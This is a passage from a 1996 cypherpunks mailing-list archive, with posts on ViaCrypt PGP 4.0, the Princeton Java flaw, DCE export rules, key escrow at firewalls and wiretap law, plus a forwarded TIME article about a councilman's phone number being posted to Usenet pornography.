>of the currency.

Strange how religion and monetary markets work.
They both demand the suspension of fact and or physical items in favor of
some ethereal object or person's view of reality.

I'm not saying that the dollar is some object that does not physically exist,
I'm just saying that the value inherent is no longer based on a physical item.

Question. 
If e-cash were backed by gold would that make it more reliable than say the 
dollar?  


PGP encrypted mail preferred.  
Scott J. Schryvers <schryver@radiks.net>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzFX9usAAAEH/2r2eovPAoYZbxzmfJ1DW7yjjdVnckXjUVKU/zZNAUV/IjzF
GDEq040wbAG1rFHDYoBOjjJTOGWMFuZ9apqoAvvI7Q4NAmVrNif0Rp8q/j4jib13
dlAA4Q0nvJZ5YNw4sf4r0iug76+9i0WpIZoP60DEB8BTuyCP55+nsbe7Ii3xLRyq
ThZ2fhNqK2hD/rFugXK29Ynyzuc6TuFfu78kVOsYUUbQpplXyaLjhGKN94pZ5jox
x7/wvqmBoH9E3rnaIPY9vOwy3kvMmCTlkjhlCzMXZHDn0e3UHWAax2mUTMttRzzi
+SUv45h6ua+eSwUkA8uojojn/JiPOKIPwPk3hq0ABRG0KFNjb3R0IEouIFNjaHJ5
dmVycyA8c2Nocnl2ZXJAcmFkaWtzLm5ldD4=
=58dK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ron McCoy <rmccoy@mercury.interpath.com>
Date: Fri, 29 Mar 1996 09:17:48 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: ViaCrypt PGP 4.0 for Windows shipping
In-Reply-To: <2.2.32.19960327060017.0090a994@mail.teleport.com>
Message-ID: <199603271325.IAA11829@mercury.interpath.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I have not seen this here yet, so sorry if you have seen it...
> 
> ViaCrypt is claiming that they are now shipping the Windows version of their
> PGP 4.0.  (I tend to not believe marketing claims until I hear from people
> who actually have it.)
> 
> Does anyone know if there are plans for this version to be interoperable
> with PGP 3.0?
> 
> Furthermore, has anyone tried the new version?
> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction

I've got the Viacrypt Business Edition for Windows. It arrived late last
week. I don't think the personal edition is shipping yet.
 
The business edition adds features for corporate key escrow and limiting 
features available to users. I've just started playing with the software, but
it looks like some of the user control features are implemented using 
security through obscurity. The windows implementation is ok, but does 
not include DDE or OLE. The floating toolbar looks useful.

4.0 will interoperate with current versions of PGP as long as a normal 
key is generated. 4.0 allows for generation of keys limited to signing or 
encryption. These keys will not interoperate with current versions of PGP.

I'll know more as I use the software. If anyone has any specific 
question, feel free to ask.

Ron McCoy
Rmccoy@mercury.interpath.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 29 Mar 1996 12:47:13 +0800
To: Steve Gibbons <frantz@netcom.com
Subject: Re: WSJ on Big Java Flaw
Message-ID: <ad7f1c090402100404ef@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:07 PM 3/26/96, Steve Gibbons wrote:
....
>Actually, I suspected and reported the same bug some weeks before the group at
>Princeton.  <URL: http://www.aztech.net/~steve/java/~>.  That said...
....
Thanks for the pointer. I found it most interesting. I suppose that I am
glad that I am not the only one who doesn't know how DNS works.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmacfarlane@zip.sbi.com (David Macfarlane)
Date: Fri, 29 Mar 1996 22:15:30 +0800
To: cypherpunks@toad.com
Subject: Re: WSJ on Big Java Flaw
Message-ID: <9603271351.AA18267@zip_master2.sbi.com>
MIME-Version: 1.0
Content-Type: text/plain


[snip]
> >    Mr. Felten said that unscrupulous people who discovered the
> >    flaw could boobytrap a Web page on the Internet,
> >    essentially seizing control of the browser software of any
> >    PC that tapped into that page. At that point, the hackers
> >    could read or delete an entire hard disk of data files.
> >    "The consequences of this flaw are as bad as they can be,"
> >    he said.[..]
>
> The generalized halting problem comes to mind...
>
> Since it can be proved that there's no complete set of heuristics
> to tell if a given program has a characteristic (such as "secureness")
> then sooner or later someone will discover another security flaw.
>
> A question is whether a simple patch is made or if the set of heuristics
> is widened (ie, learn from mistakes) so that similar flaws can be found
> based on knowledge of that one flaw.

Since this Java error is probably deep in the bytecode interpreter,
the question is will Sun patch this *particular* problem, still allowing
others, or will it have to rewrite the interpreter so that it enforces
the language more rigorously?  They are under pressure to make a
"quick fix" (they've promised something in two days), but real
security needs to be built in to a system from the ground up,
with disciplline and thorough design.  If they need to redesign their
approach to implementing the bytecode interpreter, that could take
weeks, months?

BTW, its a testament to security through code review, as the Princeton
team probably could not have discovered this deep flaw without looking
through the code.

	David Macfarlane.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 29 Mar 1996 09:18:13 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: HP & Export of DCE
Message-ID: <199603271408.JAA08085@homeport.org>
MIME-Version: 1.0
Content-Type: text


Well, if Leahy passes, DCE is exportable.  Anyone know if the
'SecureRPC' in  DCE is the one BAL broke years back?  I asked a few
DCE supporters this, and never got an answer, so I suspect they're
still shipping bogus crypto.

Adam


----- Forwarded message from Anonymous -----

As I sit, somewhere not in North America, I can see a CD-Rom from
Hewlett-Packard, which I've had since last year. Recently I received the
following letter. I've attempted to retype its contents accurately.

---------8<--------8<--------8<--------8<--------8<--------8<--------8<

					[HP Logo]
Hewlett-Packard Company
Software and Information Delivery Operation, SST
690 East Middlefield Road
Mountain View, California 94043
415/968-9200


Dear HP-UX Support Customer,

Hewlett-Packard has uncovered a bundling problem in the DCE-Core fileset
that is on the October HP-UX Application Release 10.0 s700/800
Application CDs. These products were bundled such that they are not
compliant with U.S. Government export regulations. The part numbers for
the affected CDs and products are listed below.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 28 Mar 1996 19:26:03 +0800
To: cypherpunks@toad.com
Subject: Re: WSJ on Big Java Flaw
In-Reply-To: <31591D05.5998@unix.asb.com>
Message-ID: <199603271731.JAA07252@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mutant Rob <wlkngowl@unix.asb.com> writes:

 > The generalized halting problem comes to mind...

While it can be demonstrated that no algorithm exists to
determine whether an arbitrary Turing machine will halt, good
programs generally belong to a class somewhat less expansive than
the totality of possible Turing machines.  By imposing perfectly
reasonable constraints on program structure, it is trivial to
guarantee program termination with almost no loss in the
functionality of the typical programming language.

Indeed, any computer program which executes only forward
branches, and in which the iteration counts of all loops are
known at the time they are entered, is guaranteed to terminate.
Many people would even consider such things to be good
programming practice.

In general, the types of computer program characteristics which
make determination of halting impossible are precisely the
characteristics one does not want in trusted code, because they
make understanding the code and debugging the code intractable.

 > Since it can be proved that there's no complete set of
 > heuristics to tell if a given program has a characteristic
 > (such as "secureness") then sooner or later someone will
 > discover another security flaw.

Again, a statement which applies to Turing machines, but not to
Java.  Java has been carefully restricted to ensure that a
complete analysis of proper program behavior is possible with a
combination of runtime checks and pre-execution scanning of
imported bytecode files.  This was designed into Java from the
start.

While the abstract Java machine is provably secure, real world
implementations may suffer from the usual plethora of ills, such
as creeping damage from overflowed buffers on the stack.  This in
no way implies any faults with Java itself, and such bugs in Java
implementations will be corrected in the usual way with the
passage of time.

 > A question is whether a simple patch is made or if the set
 > of heuristics is widened (ie, learn from mistakes) so that
 > similar flaws can be found based on knowledge of that one
 > flaw.

Again, there are no known security flaws in the abstract Java
machine.  Once all bugs and oversights in existing Java
interpreters are corrected, all Java programs will be rendered
incapable of causing damage to the platforms they are run on,
unless explicitly permitted to do so by an authorized person.

Some patience while the Java support in packages like Netscape
Navigator undergoes the normal process of evolution is to be
encouraged.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Mar 1996 12:57:47 +0800
To: jsw@netscape.com
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <315908B5.72DA@netscape.com>
Message-ID: <199603271534.KAA02331@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> >         Any possibility that Netscape might build in some form of
> >         cryptography?
> > I realize ITAR rules would make this problematic, but perhaps some sort of
> > out-of-country deal for putting in the hooks for PGPhone could be done.
> 
>   The internet phone software is coming from one of the companies that
> we are acquiring.  This is one obvious application of SSL that I will be
> looking into after the merger is complete.

1) I strongly suggest that SSL is *not* in its current form the right
   technology, because internet phone type tools probably use UDP, not
   TCP.
2) I strongly hope that Netscape tries to move the product towards
   standards based mechanisms like the IETF's RTP protocol, which are
   in widespread use, rather than pushing yet more proprietary
   systems. Proprietary is bad in this instance. I believe, by the
   way, that several existing RTP implementations have encryption in
   them.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 29 Mar 1996 22:15:24 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <v02120d45ad7e0e677c40@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.960327102120.17424F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Mar 1996, Lucky Green wrote:

> At 2:08 3/26/96, Shabbir J. Safdar wrote:
> 
> 
> It is a widespread myth that wiretaps require warrants. Court ordered

Unfair.

> warrants are not required for a wiretap. They have not been required since
> the Digital Telephony Bill passed. That the net, the media, and even
> attorneys are so blissfully unaware of this, even years after the provision
> doing away with requiring warrants became law, is one of the finest
> examples of cognitive dissonance you are ever likely to find. It is too
> disturbing to believe it, so the mind ignores the facts.

Unfair.

> 
> Excerpt from the Digital Telephony Bill
> 
> quote
> SEC. 103. ASSISTANCE CAPABILITY REQUIREMENTS.
> (a) Capability Requirements: [...] a telecommunications carrier shall
> ensure that its equipment, facilities, or services, that provide a customer
> or subscriber with the ability to originate, terminate, or direct
> communications are capable of--
> 
> (1) expeditiously isolating and enabling the government, pursuant to a
> court order or other form of authorization, to intercept, [...] all wire
> and electronic communications [...].
> end quote
> 
> *Other forms of authorization*, other than a court ordered warrant that is,
> are explicitly allowed. Nowhere in the bill, or anywhere else AFIK, is
> stated what form these other forms of authorization can take. No limits
> whatsoever as to what the government can do.
> 
> "My supervisor approved it" may well suffice.
> 
> 
Untrue.

I see no reason whatsoever to believe that an un-warranted wiretap would 
be legal in any but two cases.  (1) Emergency threatening life (e.g. 
hostage-taking) pending judicial authorizaiton -- very rare.
(2) The president claims residual authority to wiretap on national 
security grounds without a court order.  Since the FISA court provides 
the authority, this (one is told) is not used.

There is no question that the Justice dept is very cagey about not ever 
admitting that one has an exhausive list of means by which they claim the 
authority to tap.  If some other tap is in use, however, it is an awfully 
well-kept secret, which argues that it is used for inltellignece and not 
law enforcement.  LEOs can't keep that kind of secret any more.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Thu, 28 Mar 1996 11:49:18 +0800
To: perry@piermont.com
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <315908B5.72DA@netscape.com>
Message-ID: <31598E35.1CFB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

> 2) I strongly hope that Netscape tries to move the product towards
>    standards based mechanisms like the IETF's RTP protocol, which are
>    in widespread use, rather than pushing yet more proprietary
>    systems. Proprietary is bad in this instance.

Personally, I have some trouble with the work proprietary above.

    SSL 2 and SSL 3 protocols have been IETF drafts from the beginning.
    Discussion has been going on in a public forum since
	SSL 2 was first proposed. (Send a message to
	ssl-talk-request@netscape.com with "subscribe" in
	the Subject: to join the discussions.
    There is no trademark or copyright on the name.
    Netscape makes an SSL 2 implementation available with a no-cost
	license for non-commercial applications
    Other implementations done directly from the SSL 2 spec
	are also available.

SSL 3 has been made available to the newly convened IETF Transport Level
Security working group. If you want to be involved in the process send a
message to ietf-tls-request@w3.com with "subscribe" in the Subject
field.

SSL does depend upon an underlying reliable bytestream. This means it is
not the best choice for all applications. There are many for which it is
more than adequate.

PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://home.netscape.com/people/karlton
Netscape Communications

     They that can give up essential liberty to obtain a little
     temporary safety deserve neither liberty nor safety.
		- Benjamin Franklin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Mar 1996 12:53:05 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271408.JAA08085@homeport.org>
Message-ID: <199603271607.LAA02400@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> Well, if Leahy passes, DCE is exportable.  Anyone know if the
> 'SecureRPC' in  DCE is the one BAL broke years back?

No, they broke Sun's Secure RPC, which is different.

I must admit that I've never done a serious security analysis of DCE
RPC, though...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Fri, 29 Mar 1996 07:56:40 +0800
To: perry@piermont.com
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <199603271856.NAA03030@jekyll.piermont.com>
Message-ID: <3159926C.FF6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

> We aren't talking about SSL, Mr. Karlton.

My apologies for misunderstanding what you wrote. It could be that I am
oversensitive on the issue since SSL has been "accused" of being
proprietary in many forums.

> If you don't know what RTP is,
> you to learn before talking about it.

I am not an expert, but I do have some familiarity, and I wasn't talking
about it.

PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://home.netscape.com/people/karlton
Netscape Communications

     They that can give up essential liberty to obtain a little
     temporary safety deserve neither liberty nor safety.
		- Benjamin Franklin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 28 Mar 1996 07:58:55 +0800
To: perry@piermont.com
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271607.LAA02400@jekyll.piermont.com>
Message-ID: <199603271619.LAA08716@homeport.org>
MIME-Version: 1.0
Content-Type: text


Perry E. Metzger wrote:

| Adam Shostack writes:
| > Well, if Leahy passes, DCE is exportable.  Anyone know if the
| > 'SecureRPC' in  DCE is the one BAL broke years back?
| 
| No, they broke Sun's Secure RPC, which is different.

I wasn't aware there were multiple things masquerading under the name
Secure RPC.  In any event, does the crypto in DCE stand up to the
LaMacchia/Odlyzko attacks?  (And did Sun ever upgrade what they ship?)


Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Mar 1996 08:55:22 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271619.LAA08716@homeport.org>
Message-ID: <199603271621.LAA02453@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> | Adam Shostack writes:
> | > Well, if Leahy passes, DCE is exportable.  Anyone know if the
> | > 'SecureRPC' in  DCE is the one BAL broke years back?
> | 
> | No, they broke Sun's Secure RPC, which is different.
> 
> I wasn't aware there were multiple things masquerading under the name
> Secure RPC.  In any event, does the crypto in DCE stand up to the
> LaMacchia/Odlyzko attacks?

They are attacks against Diffie-Hellman. I don't know if DCE uses D-H
in a similar manner. The main problem was too small a (fixed) modulus.

> (And did Sun ever upgrade what they ship?)

I don't believe so.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Fri, 29 Mar 1996 07:58:36 +0800
To: Dan Ringley <kermie@paonline.com>
Subject: Re: DESCRIBE
In-Reply-To: <v05000500ad7dabd636ba@[198.69.90.213]>
Message-ID: <Pine.SUN.3.92.960327113347.25236D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Mar 1996, Dan Ringley wrote:

> Take me off of the God Forbidden list already! Now!
>
>
>
What God hath joined together, let no man put asunder.

Like Dan Ringley and terminal cluelessness.

Charles Bell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 29 Mar 1996 15:05:47 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: firewalls and CKE (fwd)
Message-ID: <199603271650.LAA08842@homeport.org>
MIME-Version: 1.0
Content-Type: text


Marcus Ranum posted this to firewalls.  Contains some interesting
technical arguments against key escrow at the firewall level.


----- Forwarded message from Marcus J. Ranum -----

>From firewalls-owner@GreatCircle.COM  Mon Mar 25 21:26:27 1996
From: "Marcus J. Ranum" <mjr@clark.net>
Message-Id: <199603252204.RAA01115@clark.net>
Subject: Re: firewalls and CKE
To: mckenney@smiley.mitre.org (Brian W. McKenney)
Date: Mon, 25 Mar 1996 17:04:41 -0500 (EST)


Brian W. McKenney writes:
>I missed the jist of the original message

	The gist of the first message was that software
key escrow is here, and it is the greatest thing since the
discovery of fire. :)  Granted, it's nice that someone
has found a way of convincing the government to let them
export good crypto, but in this particular application it makes
no sense.

>For the firewall-to-firewall encryption
>scenario, the data recovery component (DRC) may be a machine that
>intercepts (in real-time) the traffic and then decrypts the data (recovers
>the data).  The interception of encrypted data makes sense for this type of
>communication since the data is not really stored on the firewall (it is
>wrapped/unwrapped quickly).  [the intercepted packet may be copied and then
>decrypted]

	That's completely brain-damaged if you think about it for
a second.

	Let's suppose I have a file and it is unencrypted. I
FTP it through my SKE-equipped firewall to the Paris office. 
My file gets transparently encrypted as it is broken into packets
and sent across the 'net. Then - what - someday I need the file
back so I get the escrowed key and reassemble the file from
raw packets? That's dumb! I dunno about you but I'd just recover
the clear file from a backup tape. :)

	Firewall-to-firewall encryption is a link-layer security
technology.  It encrypts data in transit: before it leaves and
after it arrives you *already* have a clear-text un-escrowed
version of the data. If I have a corporate requirement
to "escrow" my telnet sessions then I'll use a version
of telnet that logs keystrokes. But I can't see any reason
(unless I'm a spook) to de-archive, de-escrow, and reassemble a
telnet session for archival purposes.  It gets worse since
all the "escrowed" packets will be mishmoshed in with DNS queries
(all "escrowed") and NFS packets and lordy knows what else. If
it came to having packet records, why not simply log all
packets *before* they get encrypted at the firewall, while
they are still in the clear? Easier, no?

 	At least LOTUS' "key escrow" approach is openly
designed for the spooks and doesn't pretend to add value to
the end user.

	I appreciate that TIS has made a successful deal with
the devil to export some strong encryption, but it's unfortunate
that they're showcasing it in a way which makes absolutely no
sense at all.  It's a shame, because basically we're seeing
smart people doing technically goofy things in order to
comply with some ridiculous laws.

mjr.

----- End of forwarded message from Marcus J. Ranum -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 18:48:27 +0800
To: cypherpunks@toad.com
Subject: More on "Raised Awareness"
Message-ID: <ad7e50ff1a021004d4d0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:30 AM 3/27/96, Rich Graves wrote:

>At some point in this exercise, though, we might be "raising awareness"
>among the wrong people, to cite Tim May. I wouldn't want NAFTA, the WTO,
>and so on enforcing ITAR.

I'm glad to see that some people are internalizing this point about how
"raised awareness" almost always results in new legislation. And new
legislation, even if seemingly well-intentioned, almost always extends the
tendrils of government into what were once ignored or private areas.

There are many examples outside of crypto. Health care reform was the
latest case of "raised awareness." Pornography access on the Net was
another.

The systemic reasons for this are clear.

"Leaving well enough alone" and "Don't make waves" are old aphorisms that
capture this sentiment.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Thu, 28 Mar 1996 15:55:03 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <199603272017.MAA09654@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 27,  3:13am, Timothy C. May wrote:
> Americans are typically thousands of miles away from those speaking
> Japanese, Mandarin, Tagalog, Polish, Italian, Dutch, Spanish, Hindi,
> Talegu, and the hundreds of other languages. It is not at all clear what
> language Americans should pick as a "second language" to study.

I don't really disagree with the conclusions drawn by this poster, or
with the quasi-economics argument he makes.  However, I must say that
the above is completely wrong.  MOST Americans live in large urban
areas, & as such are within seconds/footsteps of people whose native
languages are not English (or who don't have a single "native language",
but several!).  There are probably _hundreds_ of languages spoken in the
San Francisco Bay Area.  The school districts here routinely report double
digit languages in the school age population.

There are 3 Spanish language channels (& another 2 ... "multiple
choice") on my tv cable system.  That anglophones choose to tune them
out, or to not even notice the Noah's ark around them, says something
about this culture.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Zambini <jlasser@rwd.goucher.edu>
Date: Thu, 28 Mar 1996 08:52:42 +0800
To: cypherpunks <kelli@zeus.towson.edu>
Subject: Councilman/Usenet porn case...
Message-ID: <Pine.SUN.3.91.960327121637.17983A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


What's most interesting about this is that whoever forged the email 
headers forged anon.penet.fi in there...

Other than that, I'm not sure what the point is.... but that caught my eye.
Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.

---------- Forwarded message ----------
Date: Wed, 27 Mar 1996 12:16:01 -0500
From: Bruce Zambini <jlasser@rwd.goucher.edu>
To: jlasser@goucher.edu
Subject: web.html


   
   
   TIME Magazine
   
   April 1, 1996 Volume 147, No. 14
     _________________________________________________________________
   
   Return to Contents page
     _________________________________________________________________
   
   
WAY WRONG NUMBER

  HELL HATH NO FURY LIKE A CITY COUNCILMAN PORNED
  
   
   
   JOSHUA QUITTNER 
   
   This is a tale about how an online prank grows into an international
   incident. It also goes a long way toward explaining the fear many
   non-Internet people have about this out-of-control thing called
   cyberspace.
   
   Our story begins on the banks of Lake Erie, in Willowick, Ohio (pop.
   15,469). It is the last Monday night in January, about 9 o'clock. City
   councilman Frank Suponcic is home with his wife Linda when the phone
   rings. Linda answers. "Hi, this is Mike," says the man at the other
   end, politely enough. Linda chats with Mike, figuring he must be a
   constituent. (As Willowick's longest-serving ward councilman, Suponcic
   has lots of voters calling him at home.) After a while, Mike asks for
   Annette. Linda tells him he has the wrong number. Mike apologizes and
   hangs up.
   
   The phone rings again at 11:30 p.m. And again. And again. Wrong
   numbers until 4:30 a.m. A weary Suponcic wonders what's up and checks
   the Caller-ID logs on his phone. The first call was from British
   Columbia. The next was from Connecticut. There was one from
   Indianapolis and a few from California. Clearly these are not
   constituents. But who are they?
   
   Suponcic calls the Canadian back--it is now 5:30 a.m. in that time
   zone, and he is only too happy to wake the dude up--and he demands to
   know what is going on. The guy explains, vaguely, that he was merely
   answering an "ad on the Internet. You know, the one about horny
   housewives..."
   
   So now we have a problem. Suponcic, like a lot of people, has a new
   computer. But like most people, he hardly knows what the Internet is.
   Now, somewhere there's an ad on it. For horny housewives. With his
   home phone number.
   
   That night, when the next wrong number came in, Suponcic interrogated
   the caller and learned that the councilman's phone number was printed
   at the bottom of some pictures of naked women that had been posted to
   a Usenet newsgroup called alt.binaries.pictures.erotica, which,
   naturally, Suponcic had never heard of. But he had a friend in
   Cleveland who was something of a computer buff. So the next day the
   two of them jacked into Usenet and spent three hours sifting through
   about 7,400 files on alt. binaries.etc.
   
   Eventually, they found two with Suponcic's phone number. One featured
   a topless brunet wearing only a string of pearls and offering phone
   calls for "as low as 87 [cents] per minute." The other showed a blond
   woman advertising "hot amateur wives ready for you from there [sic]
   own bed." Yikes.
   
   Over the next week, Suponcic received more than 75 calls a day from
   lusty Netizens. "You just could not make phone calls," says the
   exasperated councilman. "And when you went to bed, you had to take
   your phone off the hook."
   
   It was the sorcerer's apprentice scenario, and there was no way to
   stop it.
   
   Suponcic, being a public official, knew his way around the local
   police department, and soon a detective started pounding the Net. By
   tracing the header information on the Usenet postings, the detective
   determined--O.K., this part is murky, we admit--that the messages had
   originated in Ohio, passed through Florida Online, an Internet
   provider in the Sunshine State, and then through anon.penet.fi, a free
   E-mail remailer service based in Finland that allows Internet users to
   post messages anonymously.
   
   The identity of the poster was, and is, unknown, though Suponcic has
   his suspicions. "It's my personal belief that the root of this is
   political," says the councilman, who had to get an unlisted telephone
   number and whose wife now wants to move.
   
   On Feb. 6, at Suponcic's urging, the Willowick city council passed a
   resolution asking the state and federal governments to close the
   "loopholes" that allowed anonymous remailers to operate outside the
   authority of U.S. law-enforcement officials. "Once you've achieved one
   of these anonymous identities, you're dangerous, and there's no way
   law enforcement can track it," Suponcic says. "The animal's out of
   control."
   
   Still not content, Suponcic contacted Steven LaTourette, the U.S.
   Congressman who represents his district. LaTourette's staff suspects
   that the problem lies with Julf Helsingius, the Finn who runs the
   anonymous remailer. They wrote a letter to the Finnish ambassador and
   sent copies to the Secretary of State and the chairman of the House
   Committee on International Relations. The State Department agreed last
   week to look into the complaint.
   
   But here's a reality check. The Finnish remailer could not have been
   used, since anon.penet.fi no longer transmits binary image files.
   Jerry Russell, who runs Florida Online and who looked into the case,
   says he figures the whole thing was a relatively simple prank called a
   sendmail spoof, in which the prankster posts a message with a phony
   return address. He says the Willowick police never produced a copy of
   the posting for him so that he could unravel the tangle for them.
   Indeed, when the policeman called, "he didn't really understand what
   he was trying to tell me," says Russell. "The average Joe Blow police
   detective doesn't know flip about the Internet."
   
   Neither does the average public official. And that, friends, is why
   stuff like the Communications Decency Act--the Christian Coalition's
   attempt to remove pornography from the Internet--sails through
   Congress.
   
   --With reporting by Noah Robischon/New York
   
     _________________________________________________________________
   
   
   [IMAGE] 
   
   Text Only





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Bugden <jbugden@alis.com>
Date: Thu, 28 Mar 1996 08:07:31 +0800
To: "'tcmay@got.net.at.Internet (Timothy C. May)>
Subject: RE: Why Americans feel no compulsion to learn foreign languages
Message-ID: <01BB1BD8.8B6BBC00@jbugden.alis.com>
MIME-Version: 1.0
Content-Type: text/plain



Wednesday, March 27, 1996 9:55 AM, Tim May wrote
>For Europeans, knowing the language of one's immediate neighbors (probably
>only a hundred kilometers away), and knowing English, accounts for much of
>their language facility.

>Americans are typically thousands of miles away from those speaking
>Japanese, Mandarin, Tagalog, Polish, Italian, Dutch, Spanish, Hindi,
>Talegu, and the hundreds of other languages. It is not at all clear what
>language Americans should pick as a "second language" to study.

>Europeans who look down on Americans for not studying the language of their
>neigbors simply aren't familiar with a map. 

>There is not a single foreign language I can think of it that would help me
>in my goals or help anyone I know. This is the reality of a world dominated
>by English-speaking persons and in which all technical people learn
>English.

If I can paraphrase, you argue as follows:
1) People learn languages of those they may interact with. 
2) Americans do not interact with (enough) non-English speakers.
3) Therefore, learning another language does not help the goals of Americans.

While your phrase refers to geographical proximity, I think we could agree that the 
essential factor is that you interact with those that are close. If you never talk to your 
neighbours, you don't need to understand their language.

So my question: Do you not see the irony of writing this on the internet?

Plus ca change, plus c'est pareil.

Many threads within Cypherpunks have stated the irrelevancy of national boundaries
in this age of global communications. I would suggest that geographical proximity is
irrelevant for similar reasons. 

But the ability to communicate requires the ability to comprehend. While it may be 
true that "it is not at all clear what language Americans should pick as a 'second 
language'", it does not follow that you would not benefit from knowing one. 
Of course, this may be a chicken and egg problem in which your benefit is 
unclear before you learn a second language, but your motivation is zero 
unless you see the benefit.

If we choose to be unilingual, it is not because we would lack opportunity to use 
another language, but because we choose to decline such opportunity.

James Bugden
jbugden@alis.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Fri, 29 Mar 1996 08:00:18 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: ViaCrypt PGP 4.0 for Windows shipping
In-Reply-To: <2.2.32.19960327060017.0090a994@mail.teleport.com>
Message-ID: <Pine.SCO.3.91.960327121821.14269E-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Mar 1996, Alan Olsen wrote:

> ViaCrypt is claiming that they are now shipping the Windows version of their
> PGP 4.0.  (I tend to not believe marketing claims until I hear from people
> who actually have it.)

Note that ViaCrypt is now using its own version numbers.  PGP 4.0 is 
really the same crypto engine as in 2.7.1, but with some new features.

> 
> Does anyone know if there are plans for this version to be interoperable
> with PGP 3.0?
> 

I asked about that, but the answer was indefinite.  I'd say "no."


> Furthermore, has anyone tried the new version?

Yes.  We were one of the beta sites for it.  There are actually two new 
